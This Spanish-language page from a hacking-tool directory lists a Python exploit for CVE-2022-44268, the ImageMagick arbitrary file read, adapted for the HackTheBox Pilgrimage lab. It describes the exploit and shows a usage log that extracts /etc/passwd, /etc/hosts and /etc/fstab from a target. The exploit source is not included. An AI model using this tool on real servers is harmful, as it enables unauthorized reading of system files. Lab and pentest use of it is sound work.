Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2022-44268 — Exploit automatizado en Python para CVE-2022-44268 (lectura arbitraria de archivos en ImageMagick). Sube PNGs manipulados, extrae el contenido de archivos de las imágenes devueltas y guarda los resultados localmente. | Kitploit
Herramientas/GitHubGitHub/jkobierczynski/cve-2022-44268
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónCTFPruebas de Penetración
GitHubjkobierczynski/cve-2022-44268

cve-2022-44268

Exploit automatizado en Python para CVE-2022-44268 (lectura arbitraria de archivos en ImageMagick). Sube PNGs manipulados, extrae el contenido de archivos de las imágenes devueltas y guarda los resultados localmente.

Ver Repositorio
34hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit adaptado para HackTheBox Pilgrimage

Script automático en Python que utiliza cve-2022-44268 para agregar un valor de perfil con un nombre de archivo de una lista de archivos de entrada en un archivo de entrada, actualizar la carga del archivo de imagen utilizando un archivo request.req de entrada de Burpsuite (ya incluido) de la carga de archivos subiendo cada imagen modificada, y descargar las imágenes devueltas desde la URL devuelta y extraer el contenido del archivo y colocarlo en un directorio de entrada.

root@kitploit:~
$ ./cve-2022-44268.py                                                                 
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir

$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab
Descargar herramienta